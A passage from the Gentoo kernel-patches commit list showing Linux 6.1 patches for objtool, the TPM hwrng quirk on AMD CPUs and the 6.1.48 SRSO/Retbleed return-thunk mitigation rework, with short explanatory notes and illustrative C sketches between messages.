++ * code exists. These are mostly ignored for validation purposes.
++ */
++__weak bool arch_is_embedded_insn(struct symbol *sym)
++{
++	return false;
++}
++
+ #define NEGATIVE_RELOC	((void *)-1L)
+ 
+ static struct reloc *insn_reloc(struct objtool_file *file, struct instruction *insn)
+@@ -1437,7 +1454,7 @@ static int add_jump_destinations(struct objtool_file *file)
+ 			 * middle of another instruction.  Objtool only
+ 			 * knows about the outer instruction.
+ 			 */
+-			if (sym && sym->return_thunk) {
++			if (sym && sym->embedded_insn) {
+ 				add_return_call(file, insn, false);
+ 				continue;
+ 			}
+@@ -2327,6 +2344,9 @@ static int classify_symbols(struct objtool_file *file)
+ 			if (arch_is_rethunk(func))
+ 				func->return_thunk = true;
+ 
++			if (arch_is_embedded_insn(func))
++				func->embedded_insn = true;
++
+ 			if (!strcmp(func->name, "__fentry__"))
+ 				func->fentry = true;
+ 
+diff --git a/tools/objtool/include/objtool/arch.h b/tools/objtool/include/objtool/arch.h
+index beb2f3aa94ffc..861c0c60ac81e 100644
+--- a/tools/objtool/include/objtool/arch.h
++++ b/tools/objtool/include/objtool/arch.h
+@@ -90,6 +90,7 @@ int arch_decode_hint_reg(u8 sp_reg, int *base);
+ 
+ bool arch_is_retpoline(struct symbol *sym);
+ bool arch_is_rethunk(struct symbol *sym);
++bool arch_is_embedded_insn(struct symbol *sym);
+ 
+ int arch_rewrite_retpolines(struct objtool_file *file);
+ 
+diff --git a/tools/objtool/include/objtool/elf.h b/tools/objtool/include/objtool/elf.h
+index 16f4067b82aea..5d4a841fbd311 100644
+--- a/tools/objtool/include/objtool/elf.h
++++ b/tools/objtool/include/objtool/elf.h
+@@ -60,6 +60,7 @@ struct symbol {
+ 	u8 return_thunk      : 1;
+ 	u8 fentry            : 1;
+ 	u8 profiling_func    : 1;
++	u8 embedded_insn     : 1;
+ 	struct list_head pv_target;
+ };
+ 
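
The objtool hunks above split the old rethunk classification in two: only
__x86_return_thunk remains a return thunk proper (rewritten via
.return_sites), while retbleed_return_thunk and srso_safe_ret, which live
embedded inside other instructions, get the new embedded_insn flag and are
routed through add_return_call() instead. A minimal standalone sketch of
that classification, assuming a pared-down struct symbol (the scaffolding
here is hypothetical; only the symbol names come from the patch):

    #include <stdbool.h>
    #include <string.h>

    /* Illustrative stand-in for objtool's struct symbol. */
    struct symbol {
            const char *name;
            unsigned char return_thunk  : 1;
            unsigned char embedded_insn : 1;
    };

    /* Per the decode.c hunk: only the real thunk is a rethunk now. */
    static bool arch_is_rethunk(const struct symbol *sym)
    {
            return !strcmp(sym->name, "__x86_return_thunk");
    }

    /* Per the decode.c hunk: RETs living inside other instructions. */
    static bool arch_is_embedded_insn(const struct symbol *sym)
    {
            return !strcmp(sym->name, "retbleed_return_thunk") ||
                   !strcmp(sym->name, "srso_safe_ret");
    }

    /* Mirrors the classify_symbols() hunk in check.c. */
    static void classify_symbol(struct symbol *sym)
    {
            if (arch_is_rethunk(sym))
                    sym->return_thunk = 1;
            if (arch_is_embedded_insn(sym))
                    sym->embedded_insn = 1;
    }

With the split in place, the add_jump_destinations() special case keys off
sym->embedded_insn rather than sym->return_thunk, matching the check.c hunk
above.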


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-08-26 15:19 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-08-26 15:19 UTC (permalink / raw
  To: gentoo-commits

commit:     d40e0faac42c6b42986e65605d6e04768e0e8bef
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Aug 26 15:18:16 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Aug 26 15:18:16 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=d40e0faa

tpm: Enable hwrng only for Pluton on AMD CPUs

See: https://bugzilla.kernel.org/show_bug.cgi?id=217804

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 +
 2930_tpm-Enable-hwrng-for-Pluton-on-AMD-CPUs.patch | 90 ++++++++++++++++++++++
 2 files changed, 94 insertions(+)

diff --git a/0000_README b/0000_README
index 40eb5947..0c66344f 100644
--- a/0000_README
+++ b/0000_README
@@ -263,6 +263,10 @@ Patch:  2920_sign-file-patch-for-libressl.patch
 From:   https://bugs.gentoo.org/717166
 Desc:   sign-file: full functionality with modern LibreSSL
 
+Patch:  2930_tpm-Enable-hwrng-for-Pluton-on-AMD-CPUs.patch
+From:   https://lore.kernel.org/all/20230822231510.2263255-1-jarkko@kernel.org/
+Desc:   tpm: Enable hwrng only for Pluton on AMD CPUs
+
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2930_tpm-Enable-hwrng-for-Pluton-on-AMD-CPUs.patch b/2930_tpm-Enable-hwrng-for-Pluton-on-AMD-CPUs.patch
new file mode 100644
index 00000000..932e82ed
--- /dev/null
+++ b/2930_tpm-Enable-hwrng-for-Pluton-on-AMD-CPUs.patch
@@ -0,0 +1,90 @@
+From: Jarkko Sakkinen <jarkko@kernel.org>
+To: linux-integrity@vger.kernel.org
+Cc: Jerry Snitselaar <jsnitsel@redhat.com>,
+	Jarkko Sakkinen <jarkko@kernel.org>,
+	stable@vger.kernel.org, Todd Brandt <todd.e.brandt@intel.com>,
+	Peter Huewe <peterhuewe@gmx.de>, Jason Gunthorpe <jgg@ziepe.ca>,
+	Mario Limonciello <mario.limonciello@amd.com>,
+	linux-kernel@vger.kernel.org
+Subject: [PATCH v3] tpm: Enable hwrng only for Pluton on AMD CPUs
+Date: Wed, 23 Aug 2023 02:15:10 +0300	[thread overview]
+Message-ID: <20230822231510.2263255-1-jarkko@kernel.org> (raw)
+
+The vendor check introduced by commit 554b841d4703 ("tpm: Disable RNG for
+all AMD fTPMs") doesn't work properly on a number of Intel fTPMs.  On the
+reported systems the TPM doesn't reply at bootup and instead returns the
+command code back. This makes the TPM probe fail.
+
+Since Microsoft Pluton is the only known combination of an AMD CPU with an
+fTPM from another vendor, disable hwrng in all other cases. To make the
+sysadmin aware of this, also print an info message to the klog.
+
+Cc: stable@vger.kernel.org
+Fixes: 554b841d4703 ("tpm: Disable RNG for all AMD fTPMs")
+Reported-by: Todd Brandt <todd.e.brandt@intel.com>
+Closes: https://bugzilla.kernel.org/show_bug.cgi?id=217804
+Signed-off-by: Jarkko Sakkinen <jarkko@kernel.org>
+---
+v3:
+* Forgot to amend config flags.
+v2:
+* CONFIG_X86
+* Removed "Reviewed-by: Jarkko Sakkinen <jarkko@kernel.org>"
+* Removed "Signed-off-by: Mario Limonciello <mario.limonciello@amd.com>"
+---
+ drivers/char/tpm/tpm_crb.c | 33 ++++++++-------------------------
+ 1 file changed, 8 insertions(+), 25 deletions(-)
+
+diff --git a/drivers/char/tpm/tpm_crb.c b/drivers/char/tpm/tpm_crb.c
+index 65ff4d2fbe8d..ea085b14ab7c 100644
+--- a/drivers/char/tpm/tpm_crb.c
++++ b/drivers/char/tpm/tpm_crb.c
+@@ -463,28 +463,6 @@ static bool crb_req_canceled(struct tpm_chip *chip, u8 status)
+ 	return (cancel & CRB_CANCEL_INVOKE) == CRB_CANCEL_INVOKE;
+ }
+ 
+-static int crb_check_flags(struct tpm_chip *chip)
+-{
+-	u32 val;
+-	int ret;
+-
+-	ret = crb_request_locality(chip, 0);
+-	if (ret)
+-		return ret;
+-
+-	ret = tpm2_get_tpm_pt(chip, TPM2_PT_MANUFACTURER, &val, NULL);
+-	if (ret)
+-		goto release;
+-
+-	if (val == 0x414D4400U /* AMD */)
+-		chip->flags |= TPM_CHIP_FLAG_HWRNG_DISABLED;
+-
+-release:
+-	crb_relinquish_locality(chip, 0);
+-
+-	return ret;
+-}
+-
+ static const struct tpm_class_ops tpm_crb = {
+ 	.flags = TPM_OPS_AUTO_STARTUP,
+ 	.status = crb_status,
+@@ -827,9 +805,14 @@ static int crb_acpi_add(struct acpi_device *device)
+ 	if (rc)
+ 		goto out;
+ 
+-	rc = crb_check_flags(chip);
+-	if (rc)
+-		goto out;
++#ifdef CONFIG_X86
++	/* A quirk for https://www.amd.com/en/support/kb/faq/pa-410 */
++	if (boot_cpu_data.x86_vendor == X86_VENDOR_AMD &&
++	    priv->sm != ACPI_TPM2_COMMAND_BUFFER_WITH_PLUTON) {
++		dev_info(dev, "Disabling hwrng\n");
++		chip->flags |= TPM_CHIP_FLAG_HWRNG_DISABLED;
++	}
++#endif /* CONFIG_X86 */
+ 
+ 	rc = tpm_chip_register(chip);
+ 
+-- 
+2.39.2
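
Note that the replacement quirk above no longer queries
TPM2_PT_MANUFACTURER at all; the decision is made purely from the boot CPU
vendor and the ACPI TPM2 start method. A hedged sketch of that decision
table, using illustrative stand-ins for the kernel constants (the real
values live in the ACPI TPM2 table definitions):

    #include <stdbool.h>

    /* Illustrative stand-ins for the ACPI_TPM2_* start methods. */
    enum start_method {
            COMMAND_BUFFER             = 7,
            COMMAND_BUFFER_WITH_PLUTON = 13,
    };

    /*
     * Mirrors the #ifdef CONFIG_X86 block in crb_acpi_add(): on an AMD
     * CPU, any fTPM whose start method is not the Pluton command buffer
     * gets TPM_CHIP_FLAG_HWRNG_DISABLED set (and an info message logged).
     */
    static bool hwrng_should_be_disabled(bool cpu_is_amd,
                                         enum start_method sm)
    {
            return cpu_is_amd && sm != COMMAND_BUFFER_WITH_PLUTON;
    }

On Intel systems the condition never fires, so the fTPMs that tripped over
the old manufacturer query keep their hwrng, which is exactly the
regression being fixed.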


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-08-26 15:00 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-08-26 15:00 UTC (permalink / raw
  To: gentoo-commits

commit:     597ad722c61ee3671b7cd0dcefa8ce523a757ed3
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Aug 26 15:00:24 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Aug 26 15:00:24 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=597ad722

Linux patch 6.1.48

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |   4 +
 1047_linux-6.1.48.patch | 604 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 608 insertions(+)

diff --git a/0000_README b/0000_README
index 0ad2cca2..40eb5947 100644
--- a/0000_README
+++ b/0000_README
@@ -231,6 +231,10 @@ Patch:  1046_linux-6.1.47.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.47
 
+Patch:  1047_linux-6.1.48.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.48
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1047_linux-6.1.48.patch b/1047_linux-6.1.48.patch
new file mode 100644
index 00000000..eb7ca312
--- /dev/null
+++ b/1047_linux-6.1.48.patch
@@ -0,0 +1,604 @@
+diff --git a/Documentation/admin-guide/hw-vuln/srso.rst b/Documentation/admin-guide/hw-vuln/srso.rst
+index 2f923c805802f..f79cb11b080f6 100644
+--- a/Documentation/admin-guide/hw-vuln/srso.rst
++++ b/Documentation/admin-guide/hw-vuln/srso.rst
+@@ -124,8 +124,8 @@ sequence.
+ To ensure the safety of this mitigation, the kernel must ensure that the
+ safe return sequence is itself free from attacker interference.  In Zen3
+ and Zen4, this is accomplished by creating a BTB alias between the
+-untraining function srso_untrain_ret_alias() and the safe return
+-function srso_safe_ret_alias() which results in evicting a potentially
++untraining function srso_alias_untrain_ret() and the safe return
++function srso_alias_safe_ret() which results in evicting a potentially
+ poisoned BTB entry and using that safe one for all function returns.
+ 
+ In older Zen1 and Zen2, this is accomplished using a reinterpretation
+diff --git a/Makefile b/Makefile
+index 375efcfb91f8f..8bb8dd199c552 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 47
++SUBLEVEL = 48
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/x86/include/asm/entry-common.h b/arch/x86/include/asm/entry-common.h
+index 674ed46d3ceda..11203a9fe0a87 100644
+--- a/arch/x86/include/asm/entry-common.h
++++ b/arch/x86/include/asm/entry-common.h
+@@ -92,6 +92,7 @@ static inline void arch_exit_to_user_mode_prepare(struct pt_regs *regs,
+ static __always_inline void arch_exit_to_user_mode(void)
+ {
+ 	mds_user_clear_cpu_buffers();
++	amd_clear_divider();
+ }
+ #define arch_exit_to_user_mode arch_exit_to_user_mode
+ 
+diff --git a/arch/x86/include/asm/nospec-branch.h b/arch/x86/include/asm/nospec-branch.h
+index 31fa631c8587c..2f123d4fb85b5 100644
+--- a/arch/x86/include/asm/nospec-branch.h
++++ b/arch/x86/include/asm/nospec-branch.h
+@@ -168,9 +168,9 @@
+ .endm
+ 
+ #ifdef CONFIG_CPU_UNRET_ENTRY
+-#define CALL_ZEN_UNTRAIN_RET	"call zen_untrain_ret"
++#define CALL_UNTRAIN_RET	"call entry_untrain_ret"
+ #else
+-#define CALL_ZEN_UNTRAIN_RET	""
++#define CALL_UNTRAIN_RET	""
+ #endif
+ 
+ /*
+@@ -178,7 +178,7 @@
+  * return thunk isn't mapped into the userspace tables (then again, AMD
+  * typically has NO_MELTDOWN).
+  *
+- * While zen_untrain_ret() doesn't clobber anything but requires stack,
++ * While retbleed_untrain_ret() doesn't clobber anything but requires stack,
+  * entry_ibpb() will clobber AX, CX, DX.
+  *
+  * As such, this must be placed after every *SWITCH_TO_KERNEL_CR3 at a point
+@@ -189,14 +189,9 @@
+ 	defined(CONFIG_CPU_SRSO)
+ 	ANNOTATE_UNRET_END
+ 	ALTERNATIVE_2 "",						\
+-	              CALL_ZEN_UNTRAIN_RET, X86_FEATURE_UNRET,		\
++		      CALL_UNTRAIN_RET, X86_FEATURE_UNRET,		\
+ 		      "call entry_ibpb", X86_FEATURE_ENTRY_IBPB
+ #endif
+-
+-#ifdef CONFIG_CPU_SRSO
+-	ALTERNATIVE_2 "", "call srso_untrain_ret", X86_FEATURE_SRSO, \
+-			  "call srso_untrain_ret_alias", X86_FEATURE_SRSO_ALIAS
+-#endif
+ .endm
+ 
+ #else /* __ASSEMBLY__ */
+@@ -210,10 +205,21 @@
+ typedef u8 retpoline_thunk_t[RETPOLINE_THUNK_SIZE];
+ extern retpoline_thunk_t __x86_indirect_thunk_array[];
+ 
++#ifdef CONFIG_RETHUNK
+ extern void __x86_return_thunk(void);
+-extern void zen_untrain_ret(void);
++#else
++static inline void __x86_return_thunk(void) {}
++#endif
++
++extern void retbleed_return_thunk(void);
++extern void srso_return_thunk(void);
++extern void srso_alias_return_thunk(void);
++
++extern void retbleed_untrain_ret(void);
+ extern void srso_untrain_ret(void);
+-extern void srso_untrain_ret_alias(void);
++extern void srso_alias_untrain_ret(void);
++
++extern void entry_untrain_ret(void);
+ extern void entry_ibpb(void);
+ 
+ #ifdef CONFIG_RETPOLINE
+diff --git a/arch/x86/kernel/cpu/amd.c b/arch/x86/kernel/cpu/amd.c
+index 239b302973d7a..f240c978d85e4 100644
+--- a/arch/x86/kernel/cpu/amd.c
++++ b/arch/x86/kernel/cpu/amd.c
+@@ -1295,3 +1295,4 @@ void noinstr amd_clear_divider(void)
+ 	asm volatile(ALTERNATIVE("", "div %2\n\t", X86_BUG_DIV0)
+ 		     :: "a" (0), "d" (0), "r" (1));
+ }
++EXPORT_SYMBOL_GPL(amd_clear_divider);
+diff --git a/arch/x86/kernel/cpu/bugs.c b/arch/x86/kernel/cpu/bugs.c
+index d98f33ea57e47..3a893ab398a01 100644
+--- a/arch/x86/kernel/cpu/bugs.c
++++ b/arch/x86/kernel/cpu/bugs.c
+@@ -62,6 +62,8 @@ EXPORT_SYMBOL_GPL(x86_pred_cmd);
+ 
+ static DEFINE_MUTEX(spec_ctrl_mutex);
+ 
++void (*x86_return_thunk)(void) __ro_after_init = &__x86_return_thunk;
++
+ /* Update SPEC_CTRL MSR and its cached copy unconditionally */
+ static void update_spec_ctrl(u64 val)
+ {
+@@ -164,8 +166,13 @@ void __init cpu_select_mitigations(void)
+ 	md_clear_select_mitigation();
+ 	srbds_select_mitigation();
+ 	l1d_flush_select_mitigation();
+-	gds_select_mitigation();
++
++	/*
++	 * srso_select_mitigation() depends on and must run after
++	 * retbleed_select_mitigation().
++	 */
+ 	srso_select_mitigation();
++	gds_select_mitigation();
+ }
+ 
+ /*
+@@ -1013,6 +1020,9 @@ do_cmd_auto:
+ 		setup_force_cpu_cap(X86_FEATURE_RETHUNK);
+ 		setup_force_cpu_cap(X86_FEATURE_UNRET);
+ 
++		if (IS_ENABLED(CONFIG_RETHUNK))
++			x86_return_thunk = retbleed_return_thunk;
++
+ 		if (boot_cpu_data.x86_vendor != X86_VENDOR_AMD &&
+ 		    boot_cpu_data.x86_vendor != X86_VENDOR_HYGON)
+ 			pr_err(RETBLEED_UNTRAIN_MSG);
+@@ -2388,9 +2398,10 @@ static void __init srso_select_mitigation(void)
+ 		 * Zen1/2 with SMT off aren't vulnerable after the right
+ 		 * IBPB microcode has been applied.
+ 		 */
+-		if ((boot_cpu_data.x86 < 0x19) &&
+-		    (!cpu_smt_possible() || (cpu_smt_control == CPU_SMT_DISABLED)))
++		if (boot_cpu_data.x86 < 0x19 && !cpu_smt_possible()) {
+ 			setup_force_cpu_cap(X86_FEATURE_SRSO_NO);
++			return;
++		}
+ 	}
+ 
+ 	if (retbleed_mitigation == RETBLEED_MITIGATION_IBPB) {
+@@ -2419,11 +2430,15 @@ static void __init srso_select_mitigation(void)
+ 			 * like ftrace, static_call, etc.
+ 			 */
+ 			setup_force_cpu_cap(X86_FEATURE_RETHUNK);
++			setup_force_cpu_cap(X86_FEATURE_UNRET);
+ 
+-			if (boot_cpu_data.x86 == 0x19)
++			if (boot_cpu_data.x86 == 0x19) {
+ 				setup_force_cpu_cap(X86_FEATURE_SRSO_ALIAS);
+-			else
++				x86_return_thunk = srso_alias_return_thunk;
++			} else {
+ 				setup_force_cpu_cap(X86_FEATURE_SRSO);
++				x86_return_thunk = srso_return_thunk;
++			}
+ 			srso_mitigation = SRSO_MITIGATION_SAFE_RET;
+ 		} else {
+ 			pr_err("WARNING: kernel not compiled with CPU_SRSO.\n");
+@@ -2672,6 +2687,9 @@ static ssize_t gds_show_state(char *buf)
+ 
+ static ssize_t srso_show_state(char *buf)
+ {
++	if (boot_cpu_has(X86_FEATURE_SRSO_NO))
++		return sysfs_emit(buf, "Mitigation: SMT disabled\n");
++
+ 	return sysfs_emit(buf, "%s%s\n",
+ 			  srso_strings[srso_mitigation],
+ 			  (cpu_has_ibpb_brtype_microcode() ? "" : ", no microcode"));
+diff --git a/arch/x86/kernel/static_call.c b/arch/x86/kernel/static_call.c
+index a9b54b795ebff..3fbb491688275 100644
+--- a/arch/x86/kernel/static_call.c
++++ b/arch/x86/kernel/static_call.c
+@@ -184,6 +184,19 @@ EXPORT_SYMBOL_GPL(arch_static_call_transform);
+  */
+ bool __static_call_fixup(void *tramp, u8 op, void *dest)
+ {
++	unsigned long addr = (unsigned long)tramp;
++	/*
++	 * Not all .return_sites are a static_call trampoline (most are not).
++	 * Check if the 3 bytes after the return are still kernel text, if not,
++	 * then this definitely is not a trampoline and we need not worry
++	 * further.
++	 *
++	 * This avoids the memcmp() below tripping over pagefaults etc..
++	 */
++	if (((addr >> PAGE_SHIFT) != ((addr + 7) >> PAGE_SHIFT)) &&
++	    !kernel_text_address(addr + 7))
++		return false;
++
+ 	if (memcmp(tramp+5, tramp_ud, 3)) {
+ 		/* Not a trampoline site, not our problem. */
+ 		return false;
+diff --git a/arch/x86/kernel/traps.c b/arch/x86/kernel/traps.c
+index 7e8795d8b0f17..c0a5a4f225d9a 100644
+--- a/arch/x86/kernel/traps.c
++++ b/arch/x86/kernel/traps.c
+@@ -206,8 +206,6 @@ DEFINE_IDTENTRY(exc_divide_error)
+ {
+ 	do_error_trap(regs, 0, "divide error", X86_TRAP_DE, SIGFPE,
+ 		      FPE_INTDIV, error_get_trap_addr(regs));
+-
+-	amd_clear_divider();
+ }
+ 
+ DEFINE_IDTENTRY(exc_overflow)
+diff --git a/arch/x86/kernel/vmlinux.lds.S b/arch/x86/kernel/vmlinux.lds.S
+index e6939ebb606ab..78ccb5ec3c0e7 100644
+--- a/arch/x86/kernel/vmlinux.lds.S
++++ b/arch/x86/kernel/vmlinux.lds.S
+@@ -134,18 +134,18 @@ SECTIONS
+ 		KPROBES_TEXT
+ 		ALIGN_ENTRY_TEXT_BEGIN
+ #ifdef CONFIG_CPU_SRSO
+-		*(.text.__x86.rethunk_untrain)
++		*(.text..__x86.rethunk_untrain)
+ #endif
+ 
+ 		ENTRY_TEXT
+ 
+ #ifdef CONFIG_CPU_SRSO
+ 		/*
+-		 * See the comment above srso_untrain_ret_alias()'s
++		 * See the comment above srso_alias_untrain_ret()'s
+ 		 * definition.
+ 		 */
+-		. = srso_untrain_ret_alias | (1 << 2) | (1 << 8) | (1 << 14) | (1 << 20);
+-		*(.text.__x86.rethunk_safe)
++		. = srso_alias_untrain_ret | (1 << 2) | (1 << 8) | (1 << 14) | (1 << 20);
++		*(.text..__x86.rethunk_safe)
+ #endif
+ 		ALIGN_ENTRY_TEXT_END
+ 		SOFTIRQENTRY_TEXT
+@@ -154,8 +154,8 @@ SECTIONS
+ 
+ #ifdef CONFIG_RETPOLINE
+ 		__indirect_thunk_start = .;
+-		*(.text.__x86.indirect_thunk)
+-		*(.text.__x86.return_thunk)
++		*(.text..__x86.indirect_thunk)
++		*(.text..__x86.return_thunk)
+ 		__indirect_thunk_end = .;
+ #endif
+ 	} :text =0xcccc
+@@ -507,8 +507,8 @@ INIT_PER_CPU(irq_stack_backing_store);
+            "fixed_percpu_data is not at start of per-cpu area");
+ #endif
+ 
+- #ifdef CONFIG_RETHUNK
+-. = ASSERT((__ret & 0x3f) == 0, "__ret not cacheline-aligned");
++#ifdef CONFIG_RETHUNK
++. = ASSERT((retbleed_return_thunk & 0x3f) == 0, "retbleed_return_thunk not cacheline-aligned");
+ . = ASSERT((srso_safe_ret & 0x3f) == 0, "srso_safe_ret not cacheline-aligned");
+ #endif
+ 
+@@ -523,8 +523,8 @@ INIT_PER_CPU(irq_stack_backing_store);
+  * Instead do: (A | B) - (A & B) in order to compute the XOR
+  * of the two function addresses:
+  */
+-. = ASSERT(((ABSOLUTE(srso_untrain_ret_alias) | srso_safe_ret_alias) -
+-		(ABSOLUTE(srso_untrain_ret_alias) & srso_safe_ret_alias)) == ((1 << 2) | (1 << 8) | (1 << 14) | (1 << 20)),
++. = ASSERT(((ABSOLUTE(srso_alias_untrain_ret) | srso_alias_safe_ret) -
++		(ABSOLUTE(srso_alias_untrain_ret) & srso_alias_safe_ret)) == ((1 << 2) | (1 << 8) | (1 << 14) | (1 << 20)),
+ 		"SRSO function pair won't alias");
+ #endif
+ 
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index fdb6007f2eb86..a96f9a17e8b5d 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -3947,6 +3947,8 @@ static noinstr void svm_vcpu_enter_exit(struct kvm_vcpu *vcpu, bool spec_ctrl_in
+ 
+ 	guest_state_enter_irqoff();
+ 
++	amd_clear_divider();
++
+ 	if (sev_es_guest(vcpu->kvm))
+ 		__svm_sev_es_vcpu_run(svm, spec_ctrl_intercepted);
+ 	else
+diff --git a/arch/x86/lib/retpoline.S b/arch/x86/lib/retpoline.S
+index 30e76fab678a5..65c5c44f006bc 100644
+--- a/arch/x86/lib/retpoline.S
++++ b/arch/x86/lib/retpoline.S
+@@ -11,7 +11,7 @@
+ #include <asm/frame.h>
+ #include <asm/nops.h>
+ 
+-	.section .text.__x86.indirect_thunk
++	.section .text..__x86.indirect_thunk
+ 
+ .macro RETPOLINE reg
+ 	ANNOTATE_INTRA_FUNCTION_CALL
+@@ -76,75 +76,106 @@ SYM_CODE_END(__x86_indirect_thunk_array)
+ #ifdef CONFIG_RETHUNK
+ 
+ /*
+- * srso_untrain_ret_alias() and srso_safe_ret_alias() are placed at
++ * srso_alias_untrain_ret() and srso_alias_safe_ret() are placed at
+  * special addresses:
+  *
+- * - srso_untrain_ret_alias() is 2M aligned
+- * - srso_safe_ret_alias() is also in the same 2M page but bits 2, 8, 14
++ * - srso_alias_untrain_ret() is 2M aligned
++ * - srso_alias_safe_ret() is also in the same 2M page but bits 2, 8, 14
+  * and 20 in its virtual address are set (while those bits in the
+- * srso_untrain_ret_alias() function are cleared).
++ * srso_alias_untrain_ret() function are cleared).
+  *
+  * This guarantees that those two addresses will alias in the branch
+  * target buffer of Zen3/4 generations, leading to any potential
+  * poisoned entries at that BTB slot to get evicted.
+  *
+- * As a result, srso_safe_ret_alias() becomes a safe return.
++ * As a result, srso_alias_safe_ret() becomes a safe return.
+  */
+ #ifdef CONFIG_CPU_SRSO
+-	.section .text.__x86.rethunk_untrain
++	.section .text..__x86.rethunk_untrain
+ 
+-SYM_START(srso_untrain_ret_alias, SYM_L_GLOBAL, SYM_A_NONE)
++SYM_START(srso_alias_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
++	UNWIND_HINT_FUNC
+ 	ANNOTATE_NOENDBR
+ 	ASM_NOP2
+ 	lfence
+-	jmp __x86_return_thunk
+-SYM_FUNC_END(srso_untrain_ret_alias)
+-__EXPORT_THUNK(srso_untrain_ret_alias)
++	jmp srso_alias_return_thunk
++SYM_FUNC_END(srso_alias_untrain_ret)
++__EXPORT_THUNK(srso_alias_untrain_ret)
+ 
+-	.section .text.__x86.rethunk_safe
++	.section .text..__x86.rethunk_safe
++#else
++/* dummy definition for alternatives */
++SYM_START(srso_alias_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
++	ANNOTATE_UNRET_SAFE
++	ret
++	int3
++SYM_FUNC_END(srso_alias_untrain_ret)
+ #endif
+ 
+-/* Needs a definition for the __x86_return_thunk alternative below. */
+-SYM_START(srso_safe_ret_alias, SYM_L_GLOBAL, SYM_A_NONE)
+-#ifdef CONFIG_CPU_SRSO
+-	add $8, %_ASM_SP
++SYM_START(srso_alias_safe_ret, SYM_L_GLOBAL, SYM_A_NONE)
++	lea 8(%_ASM_SP), %_ASM_SP
+ 	UNWIND_HINT_FUNC
+-#endif
+ 	ANNOTATE_UNRET_SAFE
+ 	ret
+ 	int3
+-SYM_FUNC_END(srso_safe_ret_alias)
++SYM_FUNC_END(srso_alias_safe_ret)
++
++	.section .text..__x86.return_thunk
+ 
+-	.section .text.__x86.return_thunk
++SYM_CODE_START(srso_alias_return_thunk)
++	UNWIND_HINT_FUNC
++	ANNOTATE_NOENDBR
++	call srso_alias_safe_ret
++	ud2
++SYM_CODE_END(srso_alias_return_thunk)
++
++/*
++ * Some generic notes on the untraining sequences:
++ *
++ * They are interchangeable when it comes to flushing potentially wrong
++ * RET predictions from the BTB.
++ *
++ * The SRSO Zen1/2 (MOVABS) untraining sequence is longer than the
++ * Retbleed sequence because the return sequence done there
++ * (srso_safe_ret()) is longer and the return sequence must fully nest
++ * (end before) the untraining sequence. Therefore, the untraining
++ * sequence must fully overlap the return sequence.
++ *
++ * Regarding alignment - the instructions which need to be untrained,
++ * must all start at a cacheline boundary for Zen1/2 generations. That
++ * is, instruction sequences starting at srso_safe_ret() and
++ * the respective instruction sequences at retbleed_return_thunk()
++ * must start at a cacheline boundary.
++ */
+ 
+ /*
+  * Safety details here pertain to the AMD Zen{1,2} microarchitecture:
+- * 1) The RET at __x86_return_thunk must be on a 64 byte boundary, for
++ * 1) The RET at retbleed_return_thunk must be on a 64 byte boundary, for
+  *    alignment within the BTB.
+- * 2) The instruction at zen_untrain_ret must contain, and not
++ * 2) The instruction at retbleed_untrain_ret must contain, and not
+  *    end with, the 0xc3 byte of the RET.
+  * 3) STIBP must be enabled, or SMT disabled, to prevent the sibling thread
+  *    from re-poisoning the BTB prediction.
+  */
+ 	.align 64
+-	.skip 64 - (__ret - zen_untrain_ret), 0xcc
+-SYM_START(zen_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
++	.skip 64 - (retbleed_return_thunk - retbleed_untrain_ret), 0xcc
++SYM_START(retbleed_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
+ 	ANNOTATE_NOENDBR
+ 	/*
+-	 * As executed from zen_untrain_ret, this is:
++	 * As executed from retbleed_untrain_ret, this is:
+ 	 *
+ 	 *   TEST $0xcc, %bl
+ 	 *   LFENCE
+-	 *   JMP __x86_return_thunk
++	 *   JMP retbleed_return_thunk
+ 	 *
+ 	 * Executing the TEST instruction has a side effect of evicting any BTB
+ 	 * prediction (potentially attacker controlled) attached to the RET, as
+-	 * __x86_return_thunk + 1 isn't an instruction boundary at the moment.
++	 * retbleed_return_thunk + 1 isn't an instruction boundary at the moment.
+ 	 */
+ 	.byte	0xf6
+ 
+ 	/*
+-	 * As executed from __x86_return_thunk, this is a plain RET.
++	 * As executed from retbleed_return_thunk, this is a plain RET.
+ 	 *
+ 	 * As part of the TEST above, RET is the ModRM byte, and INT3 the imm8.
+ 	 *
+@@ -156,13 +187,13 @@ SYM_START(zen_untrain_ret, SYM_L_GLOBAL, SYM_A_NONE)
